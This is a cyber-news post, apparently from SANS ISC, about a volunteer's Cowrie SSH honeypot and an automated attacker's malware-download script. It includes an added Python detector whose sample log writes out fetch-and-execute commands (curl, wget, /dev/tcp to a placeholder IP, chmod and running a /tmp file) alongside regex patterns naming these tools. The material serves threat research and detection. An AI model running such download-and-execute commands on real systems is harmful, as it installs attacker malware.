The Storm Center is a worldwide network of honeypots that are set up and monitored by volunteers.
For anyone who doesn't know what a honeypot is, it is a server created specifically for the purpose of gathering information about unauthorized users that connect to it.
A honeypot is usually vulnerable by design and is often made deliberately enticing, so that unsuspecting attackers spend more time interacting with it.
The information gathered from the Storm Center's network of distributed sensors provides invaluable threat research data about the trending methodologies and suspicious IP addresses used by the nefarious threat actors that attack and exploit other computer systems over the wire.
There was no domain name pointing to my server, or links to the IP address being posted anywhere online for someone to find.
On the honeypot's web server, 449 IP addresses had been scanning, trying to enumerate directories, and searching for vulnerabilities.
Learning how to navigate and filter the data I wanted was a long process, but the realization that real live threat actors were attacking my tiny little server was very inspiring.
Aside from learning that automated bots are attacking my honeypot relentlessly, I learned a lot about how these attacks are designed by breaking down the actual scripts and commands that are run once they have successfully connected.
One of the attacks I dove into was from February 11th, 2024.
A Cowrie server is intentionally vulnerable by design: it allows a certain percentage of brute-force attempts to authenticate successfully and gain access to the server.
The second password the attacker tried allowed them in, and they ran a wide variety of commands, most likely via automated script.
First, they ran the echo command and looked at its binary, most likely to check whether the system responds to common commands as expected.
The next part of the attack tried to download malware to a temp directory and execute it.
The script began with the nohup command, which stands for 'no hangup' and keeps the launched process running after the SSH session is closed.
The script then attempts file retrieval via curl, using conditional logic to determine whether the download succeeded before falling back to further retrieval attempts: first via wget, then by opening a TCP connection directly and issuing an HTTP GET request.
Seeing a well-thought-out attack script coming from an automated scanner that brute forces any SSH port it sees on an IP range made me very aware of the real threat that exists out there for servers and devices left insecure on the open web.
We don't know if the attacker was trying to upload a miner, a bot, or command and control software, but I see those types of malware uploaded successfully every day.
One indicator to watch for is the use of commands like curl or wget connecting to unusual IP addresses.
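The download chain described above (nohup, curl, a wget fallback, a raw TCP fetch, then execution from a temp directory) and the curl/wget indicator just mentioned can be turned into a simple session-level detector over Cowrie's JSON log. The following is an added example, not code from the original post or from the Cowrie project; it assumes Cowrie's cowrie.command.input events with eventid, session, src_ip and input fields, and the sample log lines are constructed with RFC 5737 documentation addresses.

```python
import json
import re
from collections import defaultdict
# Constructed Cowrie-style JSON log lines (not a real capture). Field names follow
# Cowrie's cowrie.command.input event; IPs are from RFC 5737 documentation ranges.
SAMPLE_LOG = """
{"eventid":"cowrie.command.input","session":"a1b2","src_ip":"203.0.113.7","input":"echo hi; cat /bin/echo"}
{"eventid":"cowrie.command.input","session":"a1b2","src_ip":"203.0.113.7","input":"cd /tmp; nohup curl -O http://198.51.100.9/x.sh || wget http://198.51.100.9/x.sh"}
{"eventid":"cowrie.command.input","session":"a1b2","src_ip":"203.0.113.7","input":"exec 3<>/dev/tcp/198.51.100.9/80; cat <&3 > /tmp/x.sh"}
{"eventid":"cowrie.command.input","session":"a1b2","src_ip":"203.0.113.7","input":"chmod +x /tmp/x.sh; /tmp/x.sh"}
{"eventid":"cowrie.command.input","session":"c3d4","src_ip":"192.0.2.44","input":"uname -a; cat /proc/cpuinfo"}
"""

# One indicator per stage of the chain the post describes: fetch, stage, make runnable, run.
INDICATORS = {
    "download_tool": re.compile(r"\b(?:curl|wget)\b"),
    "raw_tcp_fetch": re.compile(r"/dev/tcp/\S+"),
    "staging_dir": re.compile(r"/(?:tmp|var/tmp|dev/shm)\b"),
    "background_exec": re.compile(r"\bnohup\b"),
    "make_executable": re.compile(r"\bchmod\s+(?:\+x|[0-7]*7[0-7]*)\b"),
    "run_staged_file": re.compile(r"(?:^|[;&|]\s*)(?:\./|/(?:tmp|var/tmp|dev/shm)/)\S+"),
}
REMOTE_HOST = re.compile(r"(?:https?://|/dev/tcp/)((?:\d{1,3}\.){3}\d{1,3})")
def parse_cowrie_lines(text):
    """Return the cowrie.command.input events from JSON lines, skipping malformed ones."""
    events = []
    for line in filter(None, (ln.strip() for ln in text.splitlines())):
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue  # a truncated or non-JSON line must not abort the whole scan
        if ev.get("eventid") == "cowrie.command.input" and "input" in ev:
            events.append(ev)
    return events

def flag_download_chains(events):
    """Report sessions that fetch from a remote host AND stage, mark or run the result."""
    sessions = defaultdict(lambda: {"src_ip": None, "indicators": set(), "hosts": set()})
    for ev in events:
        s = sessions[ev["session"]]
        s["src_ip"] = ev.get("src_ip")
        s["indicators"].update(n for n, rx in INDICATORS.items() if rx.search(ev["input"]))
        s["hosts"].update(REMOTE_HOST.findall(ev["input"]))
    findings = {}
    for sid, s in sessions.items():
        fetch = s["indicators"] & {"download_tool", "raw_tcp_fetch"}
        if fetch and s["indicators"] - fetch:  # a lone curl is not enough on its own
            findings[sid] = {"src_ip": s["src_ip"], "remote_hosts": sorted(s["hosts"]),
                             "indicators": sorted(s["indicators"])}
    return findings
```

Run it against a real cowrie.json and the remote_hosts list is what you would compare against the Storm Center's known-bad IP data; the session grouping is what keeps a single harmless curl from firing.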
Research your hardware online to make sure it's still supported by the manufacturer for security updates.
Outdated software may have vulnerabilities that make it easier to fall prey to a trap that downloads or executes malware on your home computer, which could potentially lead to a threat actor pivoting to other services on your network.
This Cyber News was published on isc.sans.edu. Publication date: Wed, 26 Jun 2024 22:13:06 +0000